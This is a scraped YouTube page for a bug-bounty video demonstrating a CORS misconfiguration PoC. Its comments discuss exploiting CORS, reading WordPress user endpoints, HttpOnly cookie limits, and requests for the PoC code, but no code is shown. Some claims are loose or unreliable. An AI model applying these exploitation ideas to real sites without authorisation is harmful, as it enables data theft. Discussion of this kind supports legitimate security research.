Это видео недоступно.
Сожалеем об этом.
Cors misconfiguration | leads to sensitive information | Bug bounty poc
HTML-код
- Опубликовано: 5 ноя 2023
- in this video i am going to show you cors vulnerability poc how you can exploit it and report it.
This video is only for education purpose only.
#hackerone #bugbounty
Disclaimer: This video is for strictly educational and informational purpose only. I own all equipment used for this demonstration. Hacking without permission is illegal so always ensure you have proper authorization before using security tools in any network environment. thanks.
What tool do you use to find that endpoint?
Can you share it with me?
Thanks a lot
gau or katana
Hey bro, I discovered a cors misconfiguration in a subdomain which has ACAO set to a subdomain of that subdomain and ACAC set to true. However I can't provide a POC because the subdomain has only a search function that seem to be immune to XSS and a login forum. Registration in this sub is suspended to ensure quality so they aren't receiving new partners. Even if it is open, I think I won't be able to register with them as they have many eligible requirements! So what should I do? If I report, will I get a bounty or it will be wasted?
cors only effctive in sensitive endpoints that are not publically exposed
welldone
I found the same bug today at the same endpoint /wp-json/wp/v2/users , but the question is it accepted as information disclosure vulnerability?
if these informstive is public then they mark as informative but some program take it as serious ..
@@lostsecc can we talk somewhere else private i have an additional note
@@lostsecc if we try to get the cookie directly we get: `Refused to get unsafe header "Set-Cookie"` , i think it's because of httponly policy, is this bug still valid? can the attacker use https website to bypass the policy?
no if site is http only and secure flag set its not impactfull
Thanks for the video brother, brother i hope u answer me i found same bug and used the same poc and i got returned the content of the url by sending that request. Nad everything but the vulnerable. Url is like an api that contains some info thats not important u can say but the. Cors worked the poc returned content should i report it or no?
they mark as informative if the endpoint or info is not sensitive
@@lostsecc thank u bro
Finding CORS ok . But CORS.html file what it fetchs from the target bro?
the response that u get in burpsuite
Does CORS works only where there is no httponly in the cookies?
no that is for protecting xss cookie stealling..
@@lostsecc then how CORS works?
impact ?
Attackers can use CORS vulnerabilities to steal sensitive data from applications like API keys, SSH keys, Personal identifiable information (PII), or users' credentials.
@@lostsecc really ? Bc i sent report to bugcrowd about the same vulnerability, but they classified it as not applicable
@@lostsecc u have discord ?
its depend on the impact..these information are publically available so they mark as informative...better to look for sensitive endpoint ..
@@lostsecc Pls, do you have discord so i can contact you ?
Code send ??
search coffinxp github
@@lostseccnot find can you send ?? Plz in drive folder
@@lostseccplease send
@@lostsecccode download in drive folder please
i will send in telegram @lostsec soon